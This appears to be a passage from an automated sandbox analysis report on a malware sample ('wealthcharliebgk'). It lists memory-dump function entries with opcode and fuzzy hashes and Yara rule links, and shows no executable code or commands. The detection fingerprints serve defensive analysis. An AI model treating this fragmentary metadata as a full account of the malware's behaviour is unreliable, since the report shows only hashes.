                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 367ff16e6e41b7634bc9f128089d86d4442ea83c5a845023f7fbcd0f8571cb79
                                                                                                                                    • Instruction ID: a359445d8313bdff5a3ab339f4368d6c7c01d19e46051689054c6e8bd815da58
                                                                                                                                    • Opcode Fuzzy Hash: 367ff16e6e41b7634bc9f128089d86d4442ea83c5a845023f7fbcd0f8571cb79
                                                                                                                                    • Instruction Fuzzy Hash: 54519774E01218DFDB44DFA9D994A9DBBF2FF89300F24916AE419AB365DB309901CF10
                                                                                                                                    Function 00247571 Relevance: .1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8e16c8d377e1a29be51da889e564921034f71303367af1d3864733f33b9354d7
                                                                                                                                    • Instruction ID: 3df6988e5dd56949c4f5285c5a836d37d54b52eac8df0ebd6325b2197e02e373
                                                                                                                                    • Opcode Fuzzy Hash: 8e16c8d377e1a29be51da889e564921034f71303367af1d3864733f33b9354d7
                                                                                                                                    • Instruction Fuzzy Hash: 1551DF74D11628CFCB68DF68D984BEDBBB2BB49301F5054AAD409A7350DB35AE85CF10
                                                                                                                                    Function 00A22AD8 Relevance: .1, Instructions: 124COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bbcd37f3305c2b4c77e3066dc5abc88db5ab4ae7ecf5d1c77087f5be2e544bbf
                                                                                                                                    • Instruction ID: a53c7df58bb64b638da8c4038dee006673678618de21c68a17bdee98c2259b2c
                                                                                                                                    • Opcode Fuzzy Hash: bbcd37f3305c2b4c77e3066dc5abc88db5ab4ae7ecf5d1c77087f5be2e544bbf
                                                                                                                                    • Instruction Fuzzy Hash: F851F4B4D01218DFDB18CFAAE8847DDBBB2BF88314F24C52AE414AB294D7749945CF54
                                                                                                                                    Function 00A22C73 Relevance: .1, Instructions: 122COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1cca3e1911191e879ea4becb371314bbcaef24ea29400c854a8c3d8003c7442e
                                                                                                                                    • Instruction ID: c94d4c2f99bf8bc3f5dbe14b73eff98ee266a048701173225d99713f7c22e9e1
                                                                                                                                    • Opcode Fuzzy Hash: 1cca3e1911191e879ea4becb371314bbcaef24ea29400c854a8c3d8003c7442e
                                                                                                                                    • Instruction Fuzzy Hash: C35120B4D00228DFCB14CFA9E4847ECBBB1BF49321F20852AE415BB294D7349986CF14
                                                                                                                                    Function 00A51BC0 Relevance: .1, Instructions: 113COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 711e868ab82b6d936cb1927e15bb909fd53d72e3c4ec82d1a2a0862a917825af
                                                                                                                                    • Instruction ID: 9010e71cf84a55dbeb3f6a7c1eb4d20504ca70283a18e5170db6efed668ea5e8
                                                                                                                                    • Opcode Fuzzy Hash: 711e868ab82b6d936cb1927e15bb909fd53d72e3c4ec82d1a2a0862a917825af
                                                                                                                                    • Instruction Fuzzy Hash: 7941CDB4E00248CFDB04DFA9D594BEDBBF1BF89305F20812AD805AB294DB755A4ACF54
                                                                                                                                    Function 00A51BD0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b10a0e5ce6fc28be1d3b5e11a541cdfc5270c594c4377cf500fc652a5d422973
                                                                                                                                    • Instruction ID: 44dea2ff4bbde21c1ea7fd3c7d1a6b0a345db4fde748d6a881218509d04a51fb
                                                                                                                                    • Opcode Fuzzy Hash: b10a0e5ce6fc28be1d3b5e11a541cdfc5270c594c4377cf500fc652a5d422973
                                                                                                                                    • Instruction Fuzzy Hash: 8D41AFB4E00248CFDB44DFA9D5947EDBBF2BF89301F24902AD805AB294DB745A4ACF54
                                                                                                                                    Function 005EA111 Relevance: .1, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875934581.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_5e0000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 54e6e81875dda00562ad5ef059d44295de92aaceb3d49cd76c44e3dc53a9c3f7
                                                                                                                                    • Instruction ID: 4adeb3259c99ceb1e388ec08138f68f696a95faf16996669e353a231c5652260
                                                                                                                                    • Opcode Fuzzy Hash: 54e6e81875dda00562ad5ef059d44295de92aaceb3d49cd76c44e3dc53a9c3f7
                                                                                                                                    • Instruction Fuzzy Hash: 7F31CE74E046888BDB08DFBAD8546EEBBF2BF89300F24D12AD419BB254DB345946CF51
                                                                                                                                    Function 001FD006 Relevance: .1, Instructions: 92COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875437484.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_1fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f6711061d1d993cf5e2c11e4f97ebc6cee2634e4a6a5ffe77e36bd0b9cc0cd99
                                                                                                                                    • Instruction ID: 948854edcaa2301fda8b1d308eb0fe2e079519c5b434a1271eb689bdc2431706
                                                                                                                                    • Opcode Fuzzy Hash: f6711061d1d993cf5e2c11e4f97ebc6cee2634e4a6a5ffe77e36bd0b9cc0cd99
                                                                                                                                    • Instruction Fuzzy Hash: A1316D7150E3C48FC7038B20D8A4621BF71AF47214F2985DBD984CF2A7C73A980ACB62
                                                                                                                                    Function 00479312 Relevance: .1, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875705589.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_470000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2dcffad697242be3ac9ae1676c3218f2a7d5edfc8cbf2ac8358802fce921e211
                                                                                                                                    • Instruction ID: 87073dc5ecdf7d5cae74a5a3f572ed1652390347b546d8048a4de177793f72e4
                                                                                                                                    • Opcode Fuzzy Hash: 2dcffad697242be3ac9ae1676c3218f2a7d5edfc8cbf2ac8358802fce921e211
                                                                                                                                    • Instruction Fuzzy Hash: CC31E274E042488FDB08DFAAC9546EEBBF2BF89300F24C02AD419BB255EB345946CF54
                                                                                                                                    Function 001ED554 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875416002.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_1ed000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9e99617a8fbdd87af320434e2e0184627f55410c5007d7d55e67a7306e02a60d
                                                                                                                                    • Instruction ID: 4b4e13b7e6b380a40670ca4244ce57f2dd5737f2421ece0c251370ebeeb08b8b
                                                                                                                                    • Opcode Fuzzy Hash: 9e99617a8fbdd87af320434e2e0184627f55410c5007d7d55e67a7306e02a60d
                                                                                                                                    • Instruction Fuzzy Hash: CE21D3B6504680EFDB15DF14E9C0B2ABF75EF88314F24C569E8094B246C336D856CBA1
                                                                                                                                    Function 001FD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875437484.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_1fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                                                                                                                                    • Instruction ID: 0d1e960966b2971c89c3cd62f1c01534a9b3f5efb8c3aee987772c787a67ade1
                                                                                                                                    • Opcode Fuzzy Hash: 36beff617af57bd7014613533ce210f433b6f5de1f90a58dcafabc589b295174
                                                                                                                                    • Instruction Fuzzy Hash: 0721F2B1604248AFDB15CF24E8C4B36BB66EB84314F34C5A9E9494B246CB36D847CB61
                                                                                                                                    Function 0024E133 Relevance: .1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c1d8e538110f54a531a7bb918ae7737b1ef4d67f7351247f8bf741c409a86907
                                                                                                                                    • Instruction ID: 758fc1631e2ca0d03c5f76f983b8c2dbe5ae7c9d126d376250d250df663f0e79
                                                                                                                                    • Opcode Fuzzy Hash: c1d8e538110f54a531a7bb918ae7737b1ef4d67f7351247f8bf741c409a86907
                                                                                                                                    • Instruction Fuzzy Hash: 22117C74E101199FEF08CFA8C8C4AADBBF9FB88304F658565E814E7245D770A955CB21
                                                                                                                                    Function 001ED54F Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875416002.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_1ed000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                    • Instruction ID: 1fbae0e8eae279f90d71eef4132730dff4c03b153cf2476fbc3cabe9d114c548
                                                                                                                                    • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                    • Instruction Fuzzy Hash: A611D376504680CFDF12CF14E9C4B1ABF71FB88314F28C5A9D8094B656C336D85ACBA2
                                                                                                                                    Function 00246698 Relevance: .1, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 896cca2751f1639fc381264fbbb363189b21b96a23f71affdb939f7c9f2cc93f
                                                                                                                                    • Instruction ID: 4fcc3252b2e73a75385f0561713a347f8a5a9203aa89be747e8ba05a3f0f5f07
                                                                                                                                    • Opcode Fuzzy Hash: 896cca2751f1639fc381264fbbb363189b21b96a23f71affdb939f7c9f2cc93f
                                                                                                                                    • Instruction Fuzzy Hash: D7114FB490020ADFDB45EFA9D58179EBBF2FF84300F4089A5D0599B359EB349A49CF81
                                                                                                                                    Function 00242320 Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 42cb04d607dbccf98c0cc086e791ed3656a97645be1d60b0b789bb6f050cc714
                                                                                                                                    • Instruction ID: bcc8d1e4a17b4bc82c8def6cf47b85e8407f1b040722d3427bb40196a60a604a
                                                                                                                                    • Opcode Fuzzy Hash: 42cb04d607dbccf98c0cc086e791ed3656a97645be1d60b0b789bb6f050cc714
                                                                                                                                    • Instruction Fuzzy Hash: 2A21FCB4D142098FCB04EFA9D9855EEBFF4BF49300F54926AD805B2210EB345A98CFA1
                                                                                                                                    Function 00245C5F Relevance: .0, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 860bc827245448f832a2ee86dbc8660231cc9d80a4b8c8c12812403f835cfa1a
                                                                                                                                    • Instruction ID: 1ab4a0fb536610ab3df43ebbd2d1b2be94bee56b8208c763bc81b3383384bb9d
                                                                                                                                    • Opcode Fuzzy Hash: 860bc827245448f832a2ee86dbc8660231cc9d80a4b8c8c12812403f835cfa1a
                                                                                                                                    • Instruction Fuzzy Hash: F2113938D00209DFCB01DFA4E8849AEBBB1FB89310F4045A6D810A7364D7345A96CF61
                                                                                                                                    Function 00245C35 Relevance: .0, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 14246ebc42eae6c72a5ee0c93ece5fa6e6732b155b9644261d799383de133be0
                                                                                                                                    • Instruction ID: 814fc5d30adf39200f9fdeb7f150d1fcab74dbe8b05c410b2e2c9038285b0fb2
                                                                                                                                    • Opcode Fuzzy Hash: 14246ebc42eae6c72a5ee0c93ece5fa6e6732b155b9644261d799383de133be0
                                                                                                                                    • Instruction Fuzzy Hash: 19D0C91F0CF7D14ECA0BC72129A98D4BE02181303438972CFC0951BCE2D08A03DC8266

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 00A52130 Relevance: 23.0, Strings: 18, Instructions: 461COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$@o]n$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp$\j]n$\j]n$\j]n$\j]n$\j]n$\j]n$\j]n$\j]n
                                                                                                                                    • API String ID: 0-2221121198
                                                                                                                                    • Opcode ID: 9a408ff4a64aca3767020b720d0de67fc1ecfb59c326fa37a95f861287b9ffa0
                                                                                                                                    • Instruction ID: 68031f9ba09623b247c2288a366edea262bedfd8db8c581a8905eab4343a4cce
                                                                                                                                    • Opcode Fuzzy Hash: 9a408ff4a64aca3767020b720d0de67fc1ecfb59c326fa37a95f861287b9ffa0
                                                                                                                                    • Instruction Fuzzy Hash: FD329074E00218CFDB68DF69D994B9DBBB2BF89300F1080A9D809AB355DB719E85DF10
                                                                                                                                    Function 00A52121 Relevance: 12.9, Strings: 10, Instructions: 366COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$@o]n$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                                                                                                                                    • API String ID: 0-3439366065
                                                                                                                                    • Opcode ID: 13a1a6f3204059cc26a707ef9acd0035897d8f83de805a1b5b92ee0163efe08e
                                                                                                                                    • Instruction ID: c787bcb9a6fc4fe0f3ed4e12b2011e6bc684ab90df5994f7c6ad87ede55eaf1b
                                                                                                                                    • Opcode Fuzzy Hash: 13a1a6f3204059cc26a707ef9acd0035897d8f83de805a1b5b92ee0163efe08e
                                                                                                                                    • Instruction Fuzzy Hash: 7A02C3B4E002188FDB58DF65D994B9DBBF2BF89300F2081A9D809AB355DB759E85CF10
                                                                                                                                    Function 00A52B00 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @o]n
                                                                                                                                    • API String ID: 0-1556374650
                                                                                                                                    • Opcode ID: 68c83fc31598803588b73fe908ef665e052e14e8fcf15db22a879aff7c981302
                                                                                                                                    • Instruction ID: 7f88ae493fabba54138402ee24389449f19eccc86aa7f311c230d8ffb11e9d6a
                                                                                                                                    • Opcode Fuzzy Hash: 68c83fc31598803588b73fe908ef665e052e14e8fcf15db22a879aff7c981302
                                                                                                                                    • Instruction Fuzzy Hash: 13B19474E00218CFDB54DFA9D884A9DBBB2FF89314F2581A9D819AB365DB30AD41CF50
                                                                                                                                    Function 00A529CE Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @o]n
                                                                                                                                    • API String ID: 0-1556374650
                                                                                                                                    • Opcode ID: 9b27fe113a3f40442cb2244cb973551d56c16d27a54d8029478f2223f66fa275
                                                                                                                                    • Instruction ID: 7cb6aa22ad194b81a4712ac7dea8df74c9f0670b4af40c8e8fe897325b83d6a5
                                                                                                                                    • Opcode Fuzzy Hash: 9b27fe113a3f40442cb2244cb973551d56c16d27a54d8029478f2223f66fa275
                                                                                                                                    • Instruction Fuzzy Hash: A671EA74E056888FDB05DFB9C895ADDBFF2BF8A301F1480AAD844AB255D7305846CF15
                                                                                                                                    Function 00A52A50 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @o]n
                                                                                                                                    • API String ID: 0-1556374650
                                                                                                                                    • Opcode ID: ceb4f52054a42922589ae4836d2aa88a921b1ae07de5656ce257e503477a9128
                                                                                                                                    • Instruction ID: 4a2c4fdb7f0d1adbb5cd59a9eb0ba92da00e62b6d6e768d708e12e5cac592d9e
                                                                                                                                    • Opcode Fuzzy Hash: ceb4f52054a42922589ae4836d2aa88a921b1ae07de5656ce257e503477a9128
                                                                                                                                    • Instruction Fuzzy Hash: D071E774E056888FDB05DFB9C895A9DBFF2BF8A301F14806AD844AB265D7305846CF15
                                                                                                                                    Function 005C7C08 Relevance: .3, Instructions: 300COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875906288.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_5c0000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6759ec02cecace764d2b7cd12d173d8d6677d68a7ecc81051eee9cc67f7ef5a2
                                                                                                                                    • Instruction ID: 9770fdfcd71be700e85a3569a544962e2bb70231c881d4de90e8b64788657efd
                                                                                                                                    • Opcode Fuzzy Hash: 6759ec02cecace764d2b7cd12d173d8d6677d68a7ecc81051eee9cc67f7ef5a2
                                                                                                                                    • Instruction Fuzzy Hash: 66E1AD74E012188FDB24DFA9D984B9DBBB2BF89300F6081A9D809BB355DB355E85CF11
                                                                                                                                    Function 00A2DE88 Relevance: .3, Instructions: 296COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 37007e69496d239799d39a1d0d9a3cd0a5b4df78ac7146d08fa7624d3f5c9fae
                                                                                                                                    • Instruction ID: ebd88357219ae488d1d9acba6bf2c7958829479f22b951c7e4694f93568ef106
                                                                                                                                    • Opcode Fuzzy Hash: 37007e69496d239799d39a1d0d9a3cd0a5b4df78ac7146d08fa7624d3f5c9fae
                                                                                                                                    • Instruction Fuzzy Hash: A4E1C174E00218CFDB24DFA9D984B9DBBB2BF89304F6081A9D409AB395DB355E85CF50
                                                                                                                                    Function 005CE250 Relevance: .3, Instructions: 292COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875906288.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_5c0000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5c7c592a55d459dcc5530177e4d399b2f8dcc97c850b358ad4f84821b4992504
                                                                                                                                    • Instruction ID: 53acd33adbb2a96b76ba9bc869999139e06a33acb5a22348073d8797e1a9d25c
                                                                                                                                    • Opcode Fuzzy Hash: 5c7c592a55d459dcc5530177e4d399b2f8dcc97c850b358ad4f84821b4992504
                                                                                                                                    • Instruction Fuzzy Hash: FCD19174E00218CFDB24DFA5D985BADBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                                    Function 005CB748 Relevance: .3, Instructions: 292COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875906288.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_5c0000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0d9aa98c4ae1e65d01bdddb32d99962d2baccb25c846c05e4a7722015be83f67
                                                                                                                                    • Instruction ID: 26133418f20b8e24a06cdb6c8729d5fbd2256f8b681402ba4fc8e6e88792b019
                                                                                                                                    • Opcode Fuzzy Hash: 0d9aa98c4ae1e65d01bdddb32d99962d2baccb25c846c05e4a7722015be83f67
                                                                                                                                    • Instruction Fuzzy Hash: E6D1A174E002188FDB64DFA5C995BADBBB2FF89300F6081A9D409AB355DB359E81CF50
                                                                                                                                    Function 005C8C40 Relevance: .3, Instructions: 292COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875906288.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_5c0000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 96a33f02977efd052309607d653fc7382d7a2998640267c827b68a386e393b1f
                                                                                                                                    • Instruction ID: 26f129e59d1e721f9d63f529057f4b765b0390d156f5dcdbf781c49edbad526c
                                                                                                                                    • Opcode Fuzzy Hash: 96a33f02977efd052309607d653fc7382d7a2998640267c827b68a386e393b1f
                                                                                                                                    • Instruction Fuzzy Hash: E2D19074E00218CFDB64DFA5D994BADBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                                    Function 005C8778 Relevance: .3, Instructions: 292COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875906288.00000000005C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
